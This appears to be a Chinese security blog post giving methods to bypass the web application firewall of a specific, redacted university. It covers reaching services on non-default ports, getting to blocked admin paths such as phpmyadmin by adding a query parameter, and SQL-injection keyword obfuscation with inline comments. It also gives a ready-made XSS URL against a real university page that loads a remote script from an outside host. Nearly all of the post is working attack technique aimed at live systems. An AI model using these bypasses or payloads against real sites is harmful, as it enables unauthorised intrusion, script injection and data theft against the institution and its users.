██大学通用型WAF不完全绕过(持续非定期更新)

Update

该██大学WAF并非██大学自研,据推测只是某商用WAF

引子

每一个想日,啊呸,测试大各个系统安全性的人都会遇到一只通用型WAF,这个冷酷的WAF一言不合就喜欢把包给reset掉。







这给各位想要刷SRC的小白帽造成了一定的困扰,本文来讲讲个人绕过这只WAF的经验。
同时如果学校负责搞这一块的人看到了,麻烦reinforce一下这个WAF,不要沉迷于炫酷的NDR和花哨的基于机器学习的防护了(求不开除)。

非默认端口导致完全绕过

  • 测试HTTPS服务
  • 测试8080/8081等端口的服务
从非主流端口刷洞往往会有惊喜哦~

路径限制绕过

这只WAF会对访问敏感路径加以限制,但是加上参数可以绕过。
  • 比如想访问 xxx.██.edu.cn/phpmyadmin/会被拦截,访问 xxx.██.edu.cn/phpmyadmin/?id=1可以绕过

XSS防护绕过

最直白的payload类似<script> alert('xss'); </script>
但是你可以用<script src=来远程加载脚本,并绕过防护
来一个我们网安院的XSS
http://██.██.edu.cn/██/██?search=naive%22%3E%20%3Cmeta%20name=%22referrer%22%20content=%22never%22%20%3E%20%3Cscript%20src=%22https://cdn.jsdelivr.net/gh/TomAPU/xsstest/test.js%22%3E%3C/script%3E%20%3C!--

SQL注入绕过

  • Union注入时union select 1 from 2替换成union/*fuckyou//*a*//*!select*/1/*fuckyou//*a*//*!from*/2
  • order by测试时直接把空格换成/**//**/


评论

发表评论

此博客中的热门博文

局域网监控软件WFilter ICF 鸡肋0day RCE漏洞挖掘

别想偷我源码:通用的针对源码泄露利用程序的反制(常见工具集体沦陷)

复现基于eBPF实现的Docker逃逸